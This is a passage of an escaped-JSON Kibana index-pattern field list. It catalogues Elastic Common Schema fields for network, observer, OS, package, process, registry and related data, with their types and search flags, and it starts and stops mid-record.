\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"network.application\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.community_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.direction\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.forwarded_ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.iana_number\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.inner.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.inner.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.transport\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"observer.os.full\"}}},{\"count\":0,\"name\":\"observer.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"observer.os.name\"}}},{\"count\":0,\"name\":\"observer.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.serial_number\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.vendor\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"organization.name\"}}},{\"count\":0,\"name\":\"os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"os.full\"}}},{\"count\":0,\"name\":\"os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"os.name\"}}},{\"count\":0,\"name\":\"os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.build_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.checksum\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.install_scope\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.installed\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.args\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.args_count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.command_line\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.command_line.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.command_line\"}}},{\"count\":0,\"name\":\"process.entity_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.executable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.executable.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.executable\"}}},{\"count\":0,\"name\":\"process.exit_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.name\"}}},{\"count\":0,\"name\":\"process.parent.args\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.args_count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.command_line\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.command_line.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.command_line\"}}},{\"count\":0,\"name\":\"process.parent.entity_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.executable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.executable.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.executable\"}}},{\"count\":0,\"name\":\"process.parent.exit_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.name\"}}},{\"count\":0,\"name\":\"process.parent.pgid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.ppid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.thread.id\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.thread.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.title.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.title\"}}},{\"count\":0,\"name\":\"process.parent.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.working_directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.working_directory.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.working_directory\"}}},{\"count\":0,\"name\":\"process.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pgid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.ppid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.thread.id\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.thread.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.title.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.title\"}}},{\"count\":0,\"name\":\"process.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.working_directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.working_directory.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.working_directory\"}}},{\"count\":0,\"name\":\"registry.data.bytes\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.data.strings\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.data.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.hive\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.key\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.user\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.author\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\